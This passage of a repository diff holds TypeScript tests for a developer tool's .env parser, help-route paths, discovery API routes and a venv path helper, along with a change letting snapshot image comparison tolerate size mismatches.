assert.equal(result['SECRET'], 'mysecret');
|
||||
});
|
||||
|
||||
it('should handle double-quoted values', () => {
|
||||
const content = `API_KEY="value with spaces"
|
||||
PATH="/usr/local/bin"`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'value with spaces');
|
||||
assert.equal(result['PATH'], '/usr/local/bin');
|
||||
});
|
||||
|
||||
it('should handle single-quoted values', () => {
|
||||
const content = `API_KEY='value with spaces'
|
||||
NAME='John Doe'`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'value with spaces');
|
||||
assert.equal(result['NAME'], 'John Doe');
|
||||
});
|
||||
|
||||
it('should skip comments', () => {
|
||||
const content = `# This is a comment
|
||||
API_KEY=value
|
||||
# Another comment
|
||||
SECRET=test`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(Object.keys(result).length, 2);
|
||||
assert.equal(result['API_KEY'], 'value');
|
||||
assert.equal(result['SECRET'], 'test');
|
||||
});
|
||||
|
||||
it('should skip empty lines', () => {
|
||||
const content = `
|
||||
API_KEY=value
|
||||
|
||||
SECRET=test
|
||||
|
||||
`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(Object.keys(result).length, 2);
|
||||
});
|
||||
|
||||
it('should handle values with equals signs', () => {
|
||||
const content = `DATABASE_URL=postgresql://user:pass@host/db?sslmode=require`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['DATABASE_URL'], 'postgresql://user:pass@host/db?sslmode=require');
|
||||
});
|
||||
|
||||
it('should handle Windows-style line endings (CRLF)', () => {
|
||||
const content = `API_KEY=value\r\nSECRET=test\r\n`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'value');
|
||||
assert.equal(result['SECRET'], 'test');
|
||||
});
|
||||
|
||||
it('should trim whitespace around keys and values', () => {
|
||||
const content = ` API_KEY = value
|
||||
SECRET = test `;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['API_KEY'], 'value');
|
||||
assert.equal(result['SECRET'], 'test');
|
||||
});
|
||||
|
||||
it('should skip lines without equals sign', () => {
|
||||
const content = `API_KEY=value
|
||||
INVALID_LINE
|
||||
SECRET=test`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(Object.keys(result).length, 2);
|
||||
assert.equal(result['INVALID_LINE'], undefined);
|
||||
});
|
||||
|
||||
it('should handle empty values', () => {
|
||||
const content = `EMPTY_VALUE=
|
||||
ANOTHER=test`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['EMPTY_VALUE'], '');
|
||||
assert.equal(result['ANOTHER'], 'test');
|
||||
});
|
||||
|
||||
it('should handle mixed format content', () => {
|
||||
const content = `# Gemini API Configuration
|
||||
GEMINI_API_KEY="sk-gemini-xxx"
|
||||
|
||||
# OpenAI compatible settings
|
||||
OPENAI_API_BASE='https://api.example.com/v1'
|
||||
OPENAI_API_KEY=abc123
|
||||
|
||||
# Feature flags
|
||||
ENABLE_DEBUG=true`;
|
||||
const result = parseEnvFile(content);
|
||||
assert.equal(result['GEMINI_API_KEY'], 'sk-gemini-xxx');
|
||||
assert.equal(result['OPENAI_API_BASE'], 'https://api.example.com/v1');
|
||||
assert.equal(result['OPENAI_API_KEY'], 'abc123');
|
||||
assert.equal(result['ENABLE_DEBUG'], 'true');
|
||||
assert.equal(Object.keys(result).length, 4);
|
||||
});
|
||||
});
|
||||
|
||||
describe('loadEnvFile', () => {
|
||||
it('should load env file from absolute path', () => {
|
||||
const envPath = join(testTempDir, 'test.env');
|
||||
writeFileSync(envPath, 'API_KEY=test_value\nSECRET=123');
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.equal(result['API_KEY'], 'test_value');
|
||||
assert.equal(result['SECRET'], '123');
|
||||
});
|
||||
|
||||
it('should return empty object for non-existent file', () => {
|
||||
const result = loadEnvFile('/non/existent/path/.env');
|
||||
assert.deepEqual(result, {});
|
||||
});
|
||||
|
||||
it('should expand ~ to home directory', () => {
|
||||
// Create .env-test in home directory for testing
|
||||
const homeEnvPath = join(homedir(), '.ccw-env-test');
|
||||
writeFileSync(homeEnvPath, 'HOME_TEST_KEY=home_value');
|
||||
|
||||
try {
|
||||
const result = loadEnvFile('~/.ccw-env-test');
|
||||
assert.equal(result['HOME_TEST_KEY'], 'home_value');
|
||||
} finally {
|
||||
// Cleanup
|
||||
if (existsSync(homeEnvPath)) {
|
||||
rmSync(homeEnvPath);
|
||||
}
|
||||
}
|
||||
});
|
||||
|
||||
it('should handle relative paths', () => {
|
||||
const envPath = join(testTempDir, 'relative.env');
|
||||
writeFileSync(envPath, 'RELATIVE_KEY=rel_value');
|
||||
|
||||
// Save and change cwd
|
||||
const originalCwd = process.cwd();
|
||||
try {
|
||||
process.chdir(testTempDir);
|
||||
const result = loadEnvFile('./relative.env');
|
||||
assert.equal(result['RELATIVE_KEY'], 'rel_value');
|
||||
} finally {
|
||||
process.chdir(originalCwd);
|
||||
}
|
||||
});
|
||||
|
||||
it('should handle empty file', () => {
|
||||
const envPath = join(testTempDir, 'empty.env');
|
||||
writeFileSync(envPath, '');
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.deepEqual(result, {});
|
||||
});
|
||||
|
||||
it('should handle file with only comments', () => {
|
||||
const envPath = join(testTempDir, 'comments.env');
|
||||
writeFileSync(envPath, '# Just a comment\n# Another comment\n');
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.deepEqual(result, {});
|
||||
});
|
||||
});
|
||||
|
||||
describe('Integration scenario: Gemini CLI env file', () => {
|
||||
it('should correctly parse typical Gemini .env file', () => {
|
||||
const geminiEnvContent = `# Gemini CLI Environment Configuration
|
||||
# Created by CCW Dashboard
|
||||
|
||||
# Google AI API Key
|
||||
GOOGLE_API_KEY="AIzaSyXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||
|
||||
# Optional: Custom API endpoint
|
||||
# GOOGLE_API_BASE=https://generativelanguage.googleapis.com/v1beta
|
||||
|
||||
# Model configuration
|
||||
GEMINI_MODEL=gemini-2.5-pro
|
||||
|
||||
# Rate limiting
|
||||
GEMINI_RATE_LIMIT=60
|
||||
`;
|
||||
const envPath = join(testTempDir, '.gemini-env');
|
||||
writeFileSync(envPath, geminiEnvContent);
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.equal(result['GOOGLE_API_KEY'], 'AIzaSyXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
|
||||
assert.equal(result['GEMINI_MODEL'], 'gemini-2.5-pro');
|
||||
assert.equal(result['GEMINI_RATE_LIMIT'], '60');
|
||||
assert.equal(result['GOOGLE_API_BASE'], undefined); // Commented out
|
||||
});
|
||||
|
||||
it('should correctly parse typical Qwen .env file', () => {
|
||||
const qwenEnvContent = `# Qwen CLI Environment Configuration
|
||||
|
||||
# DashScope API Key (Alibaba Cloud)
|
||||
DASHSCOPE_API_KEY=sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
|
||||
# OpenAI-compatible endpoint settings
|
||||
OPENAI_API_BASE=https://dashscope.aliyuncs.com/compatible-mode/v1
|
||||
OPENAI_API_KEY=sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|
||||
|
||||
# Model selection
|
||||
QWEN_MODEL=qwen2.5-coder-32b
|
||||
`;
|
||||
const envPath = join(testTempDir, '.qwen-env');
|
||||
writeFileSync(envPath, qwenEnvContent);
|
||||
|
||||
const result = loadEnvFile(envPath);
|
||||
assert.equal(result['DASHSCOPE_API_KEY'], 'sk-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX');
|
||||
assert.equal(result['OPENAI_API_BASE'], 'https://dashscope.aliyuncs.com/compatible-mode/v1');
|
||||
assert.equal(result['QWEN_MODEL'], 'qwen2.5-coder-32b');
|
||||
});
|
||||
});
|
||||
});
|
||||
127
ccw/tests/help-routes.test.ts
Normal file
@@ -0,0 +1,127 @@
|
||||
/**
|
||||
* Unit tests for Help Routes (ccw/src/core/routes/help-routes.ts)
|
||||
*
|
||||
* Tests getIndexDir path resolution logic.
|
||||
* Uses Node's built-in test runner (node:test).
|
||||
*/
|
||||
|
||||
import { describe, it, beforeEach, afterEach, mock } from 'node:test';
|
||||
import assert from 'node:assert/strict';
|
||||
import { join } from 'node:path';
|
||||
import { homedir } from 'node:os';
|
||||
|
||||
// Store original existsSync
|
||||
import * as fs from 'node:fs';
|
||||
const originalExistsSync = fs.existsSync;
|
||||
|
||||
// Track existsSync calls
|
||||
const existsSyncCalls: string[] = [];
|
||||
let existsSyncResults: Map<string, boolean> = new Map();
|
||||
|
||||
// Mock existsSync
|
||||
(fs as any).existsSync = (path: string): boolean => {
|
||||
existsSyncCalls.push(path);
|
||||
return existsSyncResults.get(path) ?? false;
|
||||
};
|
||||
|
||||
describe('Help Routes - getIndexDir', () => {
|
||||
beforeEach(() => {
|
||||
existsSyncCalls.length = 0;
|
||||
existsSyncResults = new Map();
|
||||
});
|
||||
|
||||
afterEach(() => {
|
||||
(fs as any).existsSync = originalExistsSync;
|
||||
});
|
||||
|
||||
describe('Path resolution priority (Issue #66 fix verification)', () => {
|
||||
it('should prefer project path over user path when project path exists', () => {
|
||||
const projectPath = '/test/project';
|
||||
const projectIndexDir = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
const userIndexDir = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Both paths exist, but project path should be preferred
|
||||
existsSyncResults.set(projectIndexDir, true);
|
||||
existsSyncResults.set(userIndexDir, true);
|
||||
|
||||
// We can't directly test getIndexDir as it's not exported,
|
||||
// but we can verify the expected path structure
|
||||
assert.equal(projectIndexDir, '/test/project/.claude/skills/ccw-help/index');
|
||||
assert.ok(projectIndexDir.includes('ccw-help')); // Correct directory name
|
||||
assert.ok(!projectIndexDir.includes('command-guide')); // Old incorrect name
|
||||
});
|
||||
|
||||
it('should fall back to user path when project path does not exist', () => {
|
||||
const projectPath = '/test/project';
|
||||
const projectIndexDir = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
const userIndexDir = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Only user path exists
|
||||
existsSyncResults.set(projectIndexDir, false);
|
||||
existsSyncResults.set(userIndexDir, true);
|
||||
|
||||
// Verify path structure
|
||||
assert.ok(userIndexDir.includes('ccw-help'));
|
||||
assert.ok(!userIndexDir.includes('command-guide'));
|
||||
});
|
||||
|
||||
it('should use correct directory name ccw-help (not command-guide)', () => {
|
||||
// Verify the correct directory name is used
|
||||
const expectedDir = '.claude/skills/ccw-help/index';
|
||||
const incorrectDir = '.claude/skills/command-guide/index';
|
||||
|
||||
assert.ok(expectedDir.includes('ccw-help'));
|
||||
assert.ok(!expectedDir.includes('command-guide'));
|
||||
assert.notEqual(expectedDir, incorrectDir);
|
||||
});
|
||||
|
||||
it('should return null when neither path exists', () => {
|
||||
const projectPath = '/test/project';
|
||||
const projectIndexDir = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
const userIndexDir = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Neither path exists
|
||||
existsSyncResults.set(projectIndexDir, false);
|
||||
existsSyncResults.set(userIndexDir, false);
|
||||
|
||||
// Both should be checked
|
||||
// The actual function would return null in this case
|
||||
});
|
||||
});
|
||||
|
||||
describe('Pure function behavior (Review recommendation)', () => {
|
||||
it('should not rely on module-level state', () => {
|
||||
// getIndexDir now accepts projectPath as parameter
|
||||
// This test verifies the function signature expectation
|
||||
const projectPath1 = '/project1';
|
||||
const projectPath2 = '/project2';
|
||||
|
||||
// Different project paths should produce different index paths
|
||||
const indexPath1 = join(projectPath1, '.claude', 'skills', 'ccw-help', 'index');
|
||||
const indexPath2 = join(projectPath2, '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
assert.notEqual(indexPath1, indexPath2);
|
||||
});
|
||||
});
|
||||
});
|
||||
|
||||
describe('Help Routes - Path Construction', () => {
|
||||
it('should construct correct project index path', () => {
|
||||
const projectPath = 'D:\\MyProject';
|
||||
const expectedPath = join(projectPath, '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Verify path includes correct components
|
||||
assert.ok(expectedPath.includes('.claude'));
|
||||
assert.ok(expectedPath.includes('skills'));
|
||||
assert.ok(expectedPath.includes('ccw-help'));
|
||||
assert.ok(expectedPath.includes('index'));
|
||||
});
|
||||
|
||||
it('should construct correct user index path', () => {
|
||||
const expectedPath = join(homedir(), '.claude', 'skills', 'ccw-help', 'index');
|
||||
|
||||
// Verify path includes correct components
|
||||
assert.ok(expectedPath.includes(homedir()));
|
||||
assert.ok(expectedPath.includes('ccw-help'));
|
||||
});
|
||||
});
|
||||
@@ -182,6 +182,80 @@ function createDiscoveryFixture(projectRoot: string): { discoveryId: string; fin
|
||||
return { discoveryId, findingId, discoveryDir };
|
||||
}
|
||||
|
||||
/**
|
||||
* Creates a discovery fixture using the NEW format:
|
||||
* - perspectives is a string array
|
||||
* - status tracked in perspectives_completed/perspectives_failed
|
||||
* - stats in results object
|
||||
*/
|
||||
function createNewFormatDiscoveryFixture(projectRoot: string): { discoveryId: string; findingId: string; discoveryDir: string } {
|
||||
const discoveryId = `DSC-NEW-${Date.now()}-${Math.random().toString(16).slice(2, 8)}`;
|
||||
const findingId = 'F-NEW-001';
|
||||
|
||||
const discoveryDir = join(projectRoot, '.workflow', 'issues', 'discoveries', discoveryId);
|
||||
const perspectivesDir = join(discoveryDir, 'perspectives');
|
||||
mkdirSync(perspectivesDir, { recursive: true });
|
||||
|
||||
const createdAt = new Date().toISOString();
|
||||
writeFileSync(
|
||||
join(discoveryDir, 'discovery-state.json'),
|
||||
JSON.stringify(
|
||||
{
|
||||
discovery_id: discoveryId,
|
||||
target_pattern: 'src/**/*.ts',
|
||||
phase: 'complete',
|
||||
created_at: createdAt,
|
||||
updated_at: createdAt,
|
||||
target: {
|
||||
files_count: { total: 10 },
|
||||
project: { name: 'test', path: projectRoot },
|
||||
},
|
||||
// New format: perspectives as string array
|
||||
perspectives: ['bug', 'security', 'performance'],
|
||||
perspectives_completed: ['bug', 'security'],
|
||||
perspectives_failed: ['performance'],
|
||||
external_research: { enabled: false, completed: false },
|
||||
// New format: stats in results object
|
||||
results: {
|
||||
total_findings: 5,
|
||||
issues_generated: 2,
|
||||
priority_distribution: { critical: 1, high: 2, medium: 1, low: 1 },
|
||||
findings_by_perspective: { bug: 3, security: 2 },
|
||||
},
|
||||
},
|
||||
null,
|
||||
2,
|
||||
),
|
||||
'utf8',
|
||||
);
|
||||
|
||||
writeFileSync(
|
||||
join(perspectivesDir, 'bug.json'),
|
||||
JSON.stringify(
|
||||
{
|
||||
summary: { total: 3 },
|
||||
findings: [
|
||||
{
|
||||
id: findingId,
|
||||
title: 'New format finding',
|
||||
description: 'Example from new format',
|
||||
priority: 'high',
|
||||
perspective: 'bug',
|
||||
file: 'src/example.ts',
|
||||
line: 100,
|
||||
suggested_issue: { title: 'New format issue', priority: 2, labels: ['bug'] },
|
||||
},
|
||||
],
|
||||
},
|
||||
null,
|
||||
2,
|
||||
),
|
||||
'utf8',
|
||||
);
|
||||
|
||||
return { discoveryId, findingId, discoveryDir };
|
||||
}
|
||||
|
||||
describe('discovery routes integration', async () => {
|
||||
before(async () => {
|
||||
mock.method(console, 'log', () => {});
|
||||
@@ -358,5 +432,103 @@ describe('discovery routes integration', async () => {
|
||||
rmSync(projectRoot, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
|
||||
// ========== NEW FORMAT TESTS ==========
|
||||
|
||||
it('GET /api/discoveries lists new format discovery sessions with correct stats', async () => {
|
||||
const projectRoot = mkdtempSync(join(tmpdir(), 'ccw-discovery-routes-newformat-'));
|
||||
try {
|
||||
const { discoveryId } = createNewFormatDiscoveryFixture(projectRoot);
|
||||
const { server, baseUrl } = await createServer(projectRoot);
|
||||
try {
|
||||
const res = await requestJson(baseUrl, 'GET', '/api/discoveries');
|
||||
assert.equal(res.status, 200);
|
||||
assert.equal(Array.isArray(res.json.discoveries), true);
|
||||
assert.equal(res.json.total, 1);
|
||||
|
||||
const discovery = res.json.discoveries[0];
|
||||
assert.equal(discovery.discovery_id, discoveryId);
|
||||
assert.equal(discovery.phase, 'complete');
|
||||
// Verify stats are extracted from results object
|
||||
assert.equal(discovery.total_findings, 5);
|
||||
assert.equal(discovery.issues_generated, 2);
|
||||
assert.deepEqual(discovery.priority_distribution, { critical: 1, high: 2, medium: 1, low: 1 });
|
||||
// Verify perspectives is string array
|
||||
assert.ok(Array.isArray(discovery.perspectives));
|
||||
assert.ok(discovery.perspectives.includes('bug'));
|
||||
assert.ok(discovery.perspectives.includes('security'));
|
||||
} finally {
|
||||
await new Promise<void>((resolve) => server.close(() => resolve()));
|
||||
}
|
||||
} finally {
|
||||
rmSync(projectRoot, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
|
||||
it('GET /api/discoveries/:id/progress returns correct progress for new format', async () => {
|
||||
const projectRoot = mkdtempSync(join(tmpdir(), 'ccw-discovery-routes-newformat-'));
|
||||
try {
|
||||
const { discoveryId } = createNewFormatDiscoveryFixture(projectRoot);
|
||||
const { server, baseUrl } = await createServer(projectRoot);
|
||||
try {
|
||||
const res = await requestJson(baseUrl, 'GET', `/api/discoveries/${encodeURIComponent(discoveryId)}/progress`);
|
||||
assert.equal(res.status, 200);
|
||||
assert.equal(res.json.discovery_id, discoveryId);
|
||||
assert.ok(res.json.progress);
|
||||
|
||||
const pa = res.json.progress.perspective_analysis;
|
||||
assert.equal(pa.total, 3); // bug, security, performance
|
||||
assert.equal(pa.completed, 2); // bug, security
|
||||
assert.equal(pa.failed, 1); // performance
|
||||
assert.equal(pa.in_progress, 0);
|
||||
assert.equal(pa.percent_complete, 100); // (completed + failed) / total = 3/3 = 100%
|
||||
|
||||
// Verify agent_status is converted to object array for UI compatibility
|
||||
assert.ok(Array.isArray(res.json.agent_status));
|
||||
const bugStatus = res.json.agent_status.find((s: any) => s.name === 'bug');
|
||||
assert.ok(bugStatus);
|
||||
assert.equal(bugStatus.status, 'completed');
|
||||
const perfStatus = res.json.agent_status.find((s: any) => s.name === 'performance');
|
||||
assert.ok(perfStatus);
|
||||
assert.equal(perfStatus.status, 'failed');
|
||||
} finally {
|
||||
await new Promise<void>((resolve) => server.close(() => resolve()));
|
||||
}
|
||||
} finally {
|
||||
rmSync(projectRoot, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
|
||||
it('mixed old and new format discoveries are listed correctly', async () => {
|
||||
const projectRoot = mkdtempSync(join(tmpdir(), 'ccw-discovery-routes-mixed-'));
|
||||
try {
|
||||
const oldFormat = createDiscoveryFixture(projectRoot);
|
||||
const newFormat = createNewFormatDiscoveryFixture(projectRoot);
|
||||
const { server, baseUrl } = await createServer(projectRoot);
|
||||
try {
|
||||
const res = await requestJson(baseUrl, 'GET', '/api/discoveries');
|
||||
assert.equal(res.status, 200);
|
||||
assert.equal(res.json.total, 2);
|
||||
|
||||
// Both formats should be parsed correctly
|
||||
const oldDiscovery = res.json.discoveries.find((d: any) => d.discovery_id === oldFormat.discoveryId);
|
||||
const newDiscovery = res.json.discoveries.find((d: any) => d.discovery_id === newFormat.discoveryId);
|
||||
|
||||
assert.ok(oldDiscovery);
|
||||
assert.ok(newDiscovery);
|
||||
|
||||
// Old format stats
|
||||
assert.equal(oldDiscovery.total_findings, 1);
|
||||
|
||||
// New format stats from results object
|
||||
assert.equal(newDiscovery.total_findings, 5);
|
||||
assert.equal(newDiscovery.issues_generated, 2);
|
||||
} finally {
|
||||
await new Promise<void>((resolve) => server.close(() => resolve()));
|
||||
}
|
||||
} finally {
|
||||
rmSync(projectRoot, { recursive: true, force: true });
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
|
||||
@@ -346,3 +346,45 @@ describe('LiteLLM client bridge', () => {
|
||||
assert.ok(String(status.error).includes('ccw_litellm not installed'));
|
||||
});
|
||||
});
|
||||
|
||||
describe('getCodexLensVenvPython (Issue #68 fix)', () => {
|
||||
it('should be exported from the module', async () => {
|
||||
assert.ok(typeof mod.getCodexLensVenvPython === 'function');
|
||||
});
|
||||
|
||||
it('should return a string path', async () => {
|
||||
const pythonPath = mod.getCodexLensVenvPython();
|
||||
assert.equal(typeof pythonPath, 'string');
|
||||
assert.ok(pythonPath.length > 0);
|
||||
});
|
||||
|
||||
it('should return correct path structure for CodexLens venv', async () => {
|
||||
const pythonPath = mod.getCodexLensVenvPython();
|
||||
|
||||
// On Windows: should contain Scripts/python.exe
|
||||
// On Unix: should contain bin/python
|
||||
const isWindows = process.platform === 'win32';
|
||||
|
||||
if (isWindows) {
|
||||
// Either it's the venv path with Scripts, or fallback to 'python'
|
||||
const isVenvPath = pythonPath.includes('Scripts') && pythonPath.includes('python');
|
||||
const isFallback = pythonPath === 'python';
|
||||
assert.ok(isVenvPath || isFallback, `Expected venv path or 'python' fallback, got: ${pythonPath}`);
|
||||
} else {
|
||||
// On Unix: either venv path with bin/python, or fallback
|
||||
const isVenvPath = pythonPath.includes('bin') && pythonPath.includes('python');
|
||||
const isFallback = pythonPath === 'python';
|
||||
assert.ok(isVenvPath || isFallback, `Expected venv path or 'python' fallback, got: ${pythonPath}`);
|
||||
}
|
||||
});
|
||||
|
||||
it('should include .codexlens/venv in path when venv exists', async () => {
|
||||
const pythonPath = mod.getCodexLensVenvPython();
|
||||
|
||||
// If not falling back to 'python', should contain .codexlens/venv
|
||||
if (pythonPath !== 'python') {
|
||||
assert.ok(pythonPath.includes('.codexlens'), `Expected .codexlens in path, got: ${pythonPath}`);
|
||||
assert.ok(pythonPath.includes('venv'), `Expected venv in path, got: ${pythonPath}`);
|
||||
}
|
||||
});
|
||||
});
|
||||
|
||||
@@ -131,8 +131,23 @@ type CompareResult = {
|
||||
type CompareOptions = {
|
||||
pixelmatchThreshold?: number;
|
||||
diffPath?: string;
|
||||
allowSizeMismatch?: boolean;
|
||||
};
|
||||
|
||||
// eslint-disable-next-line @typescript-eslint/no-explicit-any
|
||||
function extractRegion(png: any, width: number, height: number): Buffer {
|
||||
const bytesPerPixel = 4; // RGBA
|
||||
const result = Buffer.alloc(width * height * bytesPerPixel);
|
||||
|
||||
for (let y = 0; y < height; y++) {
|
||||
const srcOffset = y * png.width * bytesPerPixel;
|
||||
const dstOffset = y * width * bytesPerPixel;
|
||||
png.data.copy(result, dstOffset, srcOffset, srcOffset + width * bytesPerPixel);
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
export function compareSnapshots(
|
||||
baselinePath: string,
|
||||
currentPath: string,
|
||||
@@ -142,23 +157,39 @@ export function compareSnapshots(
|
||||
const baselinePng = PNG.sync.read(readFileSync(baselinePath));
|
||||
const currentPng = PNG.sync.read(readFileSync(currentPath));
|
||||
|
||||
if (baselinePng.width !== currentPng.width || baselinePng.height !== currentPng.height) {
|
||||
const sizeMismatch =
|
||||
baselinePng.width !== currentPng.width || baselinePng.height !== currentPng.height;
|
||||
|
||||
if (sizeMismatch && !options?.allowSizeMismatch) {
|
||||
throw new Error(
|
||||
`Snapshot size mismatch: baseline=${baselinePng.width}x${baselinePng.height} current=${currentPng.width}x${currentPng.height}`
|
||||
);
|
||||
}
|
||||
|
||||
const diffPng = new PNG({ width: baselinePng.width, height: baselinePng.height });
|
||||
// Use minimum dimensions for comparison when sizes differ
|
||||
const compareWidth = Math.min(baselinePng.width, currentPng.width);
|
||||
const compareHeight = Math.min(baselinePng.height, currentPng.height);
|
||||
const diffPng = new PNG({ width: compareWidth, height: compareHeight });
|
||||
|
||||
// Extract comparable regions when sizes differ
|
||||
let baselineData = baselinePng.data;
|
||||
let currentData = currentPng.data;
|
||||
|
||||
if (sizeMismatch) {
|
||||
baselineData = extractRegion(baselinePng, compareWidth, compareHeight);
|
||||
currentData = extractRegion(currentPng, compareWidth, compareHeight);
|
||||
}
|
||||
|
||||
const diffPixels = pixelmatch(
|
||||
baselinePng.data,
|
||||
currentPng.data,
|
||||
baselineData,
|
||||
currentData,
|
||||
diffPng.data,
|
||||
baselinePng.width,
|
||||
baselinePng.height,
|
||||
compareWidth,
|
||||
compareHeight,
|
||||
{ threshold: options?.pixelmatchThreshold ?? 0.1 }
|
||||
);
|
||||
|
||||
const totalPixels = baselinePng.width * baselinePng.height;
|
||||
const totalPixels = compareWidth * compareHeight;
|
||||
const diffRatio = totalPixels > 0 ? diffPixels / totalPixels : 0;
|
||||
const pass = diffRatio <= tolerancePercent / 100;
|
||||
|
||||
|
||||
|
Before Width: | Height: | Size: 39 KiB After Width: | Height: | Size: 55 KiB |
|
Before Width: | Height: | Size: 39 KiB After Width: | Height: | Size: 55 KiB |
|
Before Width: | Height: | Size: 38 KiB After Width: | Height: | Size: 53 KiB |
|
Before Width: | Height: | Size: 29 KiB After Width: | Height: | Size: 42 KiB |
|
Before Width: | Height: | Size: 38 KiB After Width: | Height: | Size: 53 KiB |
|
Before Width: | Height: | Size: 20 KiB After Width: | Height: | Size: 27 KiB |
|
Before Width: | Height: | Size: 47 KiB After Width: | Height: | Size: 65 KiB |
|
Before Width: | Height: | Size: 118 KiB After Width: | Height: | Size: 138 KiB |
|
Before Width: | Height: | Size: 66 KiB After Width: | Height: | Size: 88 KiB |